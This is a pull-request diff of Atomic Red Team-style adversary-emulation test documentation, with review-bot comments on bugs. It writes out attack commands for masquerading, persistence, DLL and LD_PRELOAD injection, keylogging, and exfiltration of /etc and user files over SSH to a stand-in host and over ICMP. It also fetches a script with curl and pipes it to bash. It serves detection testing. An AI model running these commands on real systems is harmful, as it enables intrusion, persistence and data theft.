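Review bot: the `get_prereq_command` fetches `PSTools.zip` with a bare `Invoke-WebRequest` and no integrity check, while the T1022 dependency in this same PR goes through `Invoke-WebRequestVerifyHash` with a pinned hash input; a harness that downloads and then executes a binary should verify it the same way, so add a hash input for the archive and use the verifying helper here too. This file also omits `dependency_executor_name` where T1022 sets `dependency_executor_name: powershell`; if the intended fallback is the executor's own `name` (`powershell` here), document that default in the dependencies section of the spec, otherwise add the field explicitly. The `""` in `prereq_command` is the same parse error that shows up in the generated markdown and has to be corrected in this YAML, since the markdown is regenerated from it.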
+49 -17
@@ -45,18 +45,22 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
#### Cleanup Commands:
```
del /Q /F %SystemRoot%\Temp\lsass.exe
```
<br/>
<br/>
@@ -66,7 +70,8 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cp /bin/sh /tmp/crond
/tmp/crond
@@ -74,6 +79,9 @@ cp /bin/sh /tmp/crond
<br/>
<br/>
@@ -83,18 +91,22 @@ Copies cscript.exe, renames it, and launches it to masquerade as an instance of
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
```
#### Cleanup Commands:
```
del /Q /F %APPDATA%\notepad.exe
```
<br/>
<br/>
@@ -104,18 +116,22 @@ Copies wscript.exe, renames it, and launches it to masquerade as an instance of
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe /B
```
#### Cleanup Commands:
```
del /Q /F %APPDATA%\svchost.exe
```
<br/>
<br/>
@@ -125,18 +141,22 @@ Copies powershell.exe, renames it, and launches it to masquerade as an instance
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
```
#### Cleanup Commands:
```
del /Q /F %APPDATA%\taskhostw.exe
```
<br/>
<br/>
@@ -146,25 +166,29 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inputfile | path of file to copy | path | $PathToAtomicsFolder\T1036\bin\t1036.exe|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
del #{outputfile}
```
<br/>
<br/>
@@ -174,25 +198,29 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inputfile | path of file to copy | path | $env:ComSpec|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
del #{outputfile}
```
<br/>
<br/>
@@ -203,17 +231,21 @@ This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036 > C:\T1036.txt
```
#### Cleanup Commands:
```
del C:\T1036.txt
del C:\lsm.exe
```
<br/>
+20 -8
@@ -29,19 +29,19 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_path | Path to .bat file | String | $env:SystemRoot\Temp\art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037-log.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
echo cmd /c "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
```
#### Cleanup Commands:
```
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
@@ -49,6 +49,10 @@ del #{script_path}
del "%USERPROFILE%\desktop\T1037-log.txt"
```
<br/>
<br/>
@@ -72,7 +76,6 @@ New-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1037.b
Set-Content "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1037.bat" "cmd /c #{system_command}"
```
#### Cleanup Commands:
```
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1037.bat"
@@ -80,6 +83,10 @@ Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T103
Remove-Item "$env:USERPROFILE\desktop\T1037-log.txt"
```
<br/>
<br/>
@@ -89,19 +96,23 @@ Run an exe on user logon or system startup
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
```
#### Cleanup Commands:
```
schtasks /delete /tn "T1037_OnLogon" /f
schtasks /delete /tn "T1037_OnStartup" /f
```
<br/>
<br/>
@@ -111,8 +122,7 @@ Mac logon script
**Supported Platforms:** macOS
#### Run it with these steps!
1. Create the required plist file
#### Run it with these steps! 1. Create the required plist file
sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
@@ -132,4 +142,6 @@ Mac logon script
<br/>
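Review bot: the regenerated heading `#### Run it with these steps! 1. Create the required plist file` folds the first manual step into the heading line, whereas the previous output kept `1. Create the required plist file` as its own list item under `#### Run it with these steps!`; the markdown generator's handling of manual, step-based tests appears to have lost a line break in this PR, so fix the template rather than this file and check that the other manual tests still render each step on its own line.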
+6 -2
@@ -25,18 +25,22 @@ https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
```
#### Cleanup Commands:
```
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
```
<br/>
+24 -8
@@ -25,12 +25,13 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | ens33|
#### Run it with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
@@ -38,6 +39,9 @@ tshark -c 5 -i #{interface}
<br/>
<br/>
@@ -47,12 +51,13 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | en0A|
#### Run it with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
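Review bot: the default interface `en0A` in the Inputs table does not look like a real macOS interface name (the built-in adapters are `en0`, `en1`, and so on), so the test fails with the default unless the user overrides it; if this is a typo, correct it to `en0`, otherwise say in the description where that name comes from.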
@@ -60,6 +65,9 @@ tshark -c 5 -i #{interface}
<br/>
<br/>
@@ -70,12 +78,13 @@ installed, along with WinPCAP. Windump will require the windump executable.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
c:\windump.exe
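Review bot: `c:\windump.exe` is run with no `-c` count and no `-i #{interface}`, so unlike the tshark line above it captures on the default adapter until interrupted and blocks the executor; add `-c 5 -i #{interface}` so the command terminates like the tshark one. The PowerShell variant `& c:\windump.exe` in the next hunk has the same problem.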
@@ -83,6 +92,9 @@ c:\windump.exe
<br/>
<br/>
@@ -93,12 +105,13 @@ installed, along with WinPCAP. Windump will require the windump executable.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet0|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
& "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
& c:\windump.exe
@@ -106,4 +119,7 @@ installed, along with WinPCAP. Windump will require the windump executable.
<br/>
+6 -2
@@ -22,17 +22,21 @@ Change Default File Association From cmd.exe
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extension_to_change | File Extension To Hijack | String | .wav|
| target_exenstion_handler | Thing To Open | Path | C:\Program Files\Windows Media Player\wmplayer.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
```
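Review bot: the input name `target_exenstion_handler` is misspelled (extension) in both the Inputs table and the command; since the `#{...}` placeholder has to match the YAML key, rename it in both places in the same change. Separately, `assoc` maps an extension to a file-type name, not to a program, so `assoc .wav="C:\Program Files\...\wmplayer.exe"` only stores that path as the type string and does not change what opens the file; either pair it with `ftype` on the type name or reword "Thing To Open" and the test description to say it rewrites the association entry.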
<br/>
+6 -2
@@ -27,12 +27,13 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_permission_file | check weak files permission | path | GoogleUpdate.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-WmiObject win32_service | select PathName
get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
@@ -40,4 +41,7 @@ get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | fi
<br/>
+11 -3
@@ -19,7 +19,8 @@ Scan ports to check for listening ports
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
for port in {1..65535};
do
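Review bot: the executor is `sh` but `for port in {1..65535};` relies on bash brace expansion; under a POSIX sh (dash on Debian and Ubuntu) the loop body runs once with the literal string `{1..65535}` and nothing is scanned. Either iterate with `seq 1 65535` or a while loop with arithmetic, or change the executor to `bash`.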
@@ -29,6 +30,9 @@ done
<br/>
<br/>
@@ -38,14 +42,15 @@ Scan ports to check for listening ports with Nmap.
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| network_range | Network Range to Scan. | string | 192.168.1.0/24|
| port | Ports to scan. | string | 80|
| host | Host to scan. | string | 192.168.1.1|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
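Review bot: `nmap -sS #{network_range} -p #{port}` is a raw-socket SYN scan and needs root, but the heading reads "Attack Commands: Run with `sh`!" without the "Elevation Required" marker; mark the executor as requiring elevation in the YAML so the generated heading reflects it (or use `-sT`, which works unprivileged).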
@@ -54,4 +59,7 @@ nc -nv #{host} #{port}
<br/>
+33 -9
@@ -27,13 +27,17 @@ WMI List User Accounts
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic useraccount get /ALL
```
<br/>
<br/>
@@ -43,13 +47,17 @@ WMI List Processes
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic process get caption,executablepath,commandline
```
<br/>
<br/>
@@ -59,13 +67,17 @@ WMI List Software
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic qfe get description,installedOn /format:csv
```
<br/>
<br/>
@@ -75,19 +87,23 @@ WMI List Remote Services
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 192.168.0.1|
| service_search_string | Name Of Service | String | sql server|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
```
<br/>
<br/>
@@ -97,18 +113,22 @@ This test uses wmic.exe to execute a process on the local host.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_to_execute | Name or path of process to execute. | String | calc.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic process call create #{process_to_execute}
```
<br/>
<br/>
@@ -118,17 +138,21 @@ This test uses wmic.exe to execute a process on a remote host.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 192.168.0.1|
| process_to_execute | Name or path of process to execute. | String | calc.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic /node:"#{node}" process call create #{process_to_execute}
```
<br/>
+24 -11
@@ -31,23 +31,27 @@ Input a domain and test Exfiltration over SSH
Remote to Local
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
<br/>
<br/>
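Review bot: the Inputs table declares `user_name` and `password`, but the command `ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz` uses only `#{domain}`; either drop the unused inputs or use them as the Local-to-Remote test does (`ssh #{user_name}@#{domain} ...`). Plain `ssh` cannot consume the `password` input anyway, so the description should state that key-based authentication (or an agent) is expected.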
@@ -56,34 +60,37 @@ Input a domain and test Exfiltration over SSH
Local to Remote
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```
<br/>
<br/>
## Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Run it with these steps!
1. Victim System Configuration:
#### Run it with these steps! 1. Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
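Review bot: `openssl des3 -salt -pass #{password}` fails with an "Invalid password argument" error because `-pass` expects a source specifier such as `pass:#{password}` (or `env:`/`file:`), not the bare secret, so the pipeline into `ssh` never produces the encrypted archive. Also, the Test #3 manual-steps heading is now rendered as one line, "#### Run it with these steps! 1. Victim System Configuration:", so the first numbered step is swallowed by the heading; the template should keep the newline the removed lines had.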
@@ -101,6 +108,8 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on
<br/>
<br/>
@@ -110,17 +119,21 @@ Exfiltration of specified file over ICMP protocol.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
<br/>
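Review bot: `Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024` only works in Windows PowerShell 5.1; PowerShell 6 and later removed the `Byte` encoding in favour of `-AsByteStream`, so if the new PS execution framework can be launched from pwsh this test throws on the first line. Either document Windows PowerShell as a requirement or branch on `$PSVersionTable.PSVersion`.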
-6
@@ -11,8 +11,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
input_arguments:
@@ -43,8 +41,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
input_arguments:
@@ -73,8 +69,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
+15 -3
@@ -29,7 +29,8 @@ Get a listing of network connections.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
netstat
net use
@@ -38,6 +39,9 @@ net sessions
<br/>
<br/>
@@ -47,13 +51,17 @@ Get a listing of network connections.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-NetTCPConnection
```
<br/>
<br/>
@@ -63,7 +71,8 @@ Get a listing of network connections.
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
netstat
who -a
@@ -71,4 +80,7 @@ who -a
<br/>
+14 -6
@@ -19,25 +19,29 @@ Installs A Local Service
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
```
#### Cleanup Commands:
```
sc.exe stop #{service_name}
sc.exe delete #{service_name}
```
<br/>
<br/>
@@ -47,23 +51,27 @@ Installs A Local Service via PowerShell
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1050\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
```
#### Cleanup Commands:
```
Stop-Service -Name "#{service_name}"
(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()
```
<br/>
+25 -9
@@ -24,13 +24,17 @@ Note: deprecated in Windows 8+
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
at 13:20 /interactive cmd
```
<br/>
<br/>
@@ -39,23 +43,27 @@ at 13:20 /interactive cmd
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
| time | What time 24 Hour | String | 72600|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
```
#### Cleanup Commands:
```
SCHTASKS /Delete /TN spawn /F
```
<br/>
<br/>
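Review bot: the `time` input is described as "What time 24 Hour" but its default `72600` is not a valid value for `SCHTASKS /ST`, which expects `HH:mm`; with the default the create command is rejected, the task is never registered, and the cleanup `SCHTASKS /Delete /TN spawn /F` then errors too. Change the default to an `HH:mm` value and say so in the description.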
@@ -65,7 +73,7 @@ Create a task on a remote system
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
@@ -74,17 +82,21 @@ Create a task on a remote system
| user_name | Username DOMAIN\User | String | DOMAIN\user|
| password | Password | String | At0micStrong|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
#### Cleanup Commands:
```
SCHTASKS /Delete /TN "Atomic task" /F
```
<br/>
<br/>
@@ -95,7 +107,8 @@ These could be considered "fileless" scheduled task creation.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
@@ -105,10 +118,13 @@ $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -
Register-ScheduledTask AtomicTask -InputObject $object
```
#### Cleanup Commands:
```
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
```
<br/>
+36 -12
@@ -46,13 +46,14 @@ Windows 10 Utility To Inject DLLS
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll|
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}
@@ -60,6 +61,9 @@ mavinject $mypid /INJECTRUNNING #{dll_payload}
<br/>
<br/>
@@ -69,13 +73,14 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$mypid = #{process_id}
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
@@ -83,6 +88,9 @@ Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
<br/>
<br/>
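Review bot: `Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}` runs the PowerSploit script file, which only declares the `Invoke-DllInjection` function and accepts no parameters, so PowerShell rejects `-ProcessID` and the test exercises nothing while the framework reports it as run; the script has to be dot-sourced and the function called afterwards. The bare script name and the relative default `T1055.dll` also depend on the current directory, whereas the previous test anchors its path with `PathToAtomicsFolder\T1055\src\x64\T1055.dll`.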
@@ -92,18 +100,22 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | ../bin/T1055.so|
#### Run it with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
echo #{path_to_shared_library} > /etc/ld.so.preload
```
<br/>
<br/>
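Review bot: `echo #{path_to_shared_library} > /etc/ld.so.preload` truncates the file, so any entry an administrator already had in `/etc/ld.so.preload` is destroyed and, since the hunk shows no Cleanup Commands, never restored; back the file up (or append with `>>` and remove only that line on cleanup). The default `../bin/T1055.so` is also resolved relative to each process's working directory, which is why Test #4 uses an absolute path; an unresolvable preload entry makes every process on the host print loader errors, so the default here should be absolute as well.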
@@ -113,18 +125,22 @@ This test injects a shared object library via the LD_PRELOAD environment variabl
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | /opt/AtomicRedTeam/atomics/T1055/bin/T1055.so|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
LD_PRELOAD=#{path_to_shared_library} ls
```
<br/>
<br/>
@@ -141,18 +157,22 @@ Excercises Five Techniques
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | T1055.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
.\bin\#{exe_binary}
```
<br/>
<br/>
@@ -163,17 +183,21 @@ This works by copying cmd.exe to a file, naming it svchost.exe, then copying a f
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
```
#### Cleanup Commands:
```
del C:\T1055.txt
del C:\svchost.exe
```
<br/>
+7 -3
@@ -23,21 +23,25 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filepath | Name of the local file, include path. | Path | $env:TEMP\key.log|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
```
#### Cleanup Commands:
```
Remove-Item $env:TEMP\key.log
```
<br/>
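Review bot: the cleanup `Remove-Item $env:TEMP\key.log` hardcodes the default instead of using `#{filepath}`, so an overridden log path is never removed; use `Remove-Item #{filepath}`. Also `.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}` runs the PowerSploit script file, which only declares the `Get-Keystrokes` function, so the unknown `-LogPath` parameter is rejected and nothing is started; dot-source the script and then call the function.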
+12 -4
@@ -22,15 +22,16 @@ In Mac and Linux, this is accomplished with the <code>ps</code> command.</blockq
## Atomic Test #1 - Process Discovery - ps
Utilize ps to identify processes
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | path of output file | path | /tmp/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
ps >> #{output_file}
ps aux >> #{output_file}
@@ -38,6 +39,9 @@ ps aux >> #{output_file}
<br/>
<br/>
@@ -47,11 +51,15 @@ Utilize tasklist to identify processes
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
tasklist
```
<br/>
-2
@@ -9,8 +9,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
input_arguments:
+6 -2
@@ -20,12 +20,13 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| weak_service_name | weak service check | Registry | weakservicename|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
@@ -33,4 +34,7 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
<br/>
+6 -2
View File
@@ -16,10 +16,11 @@ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is gen
This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
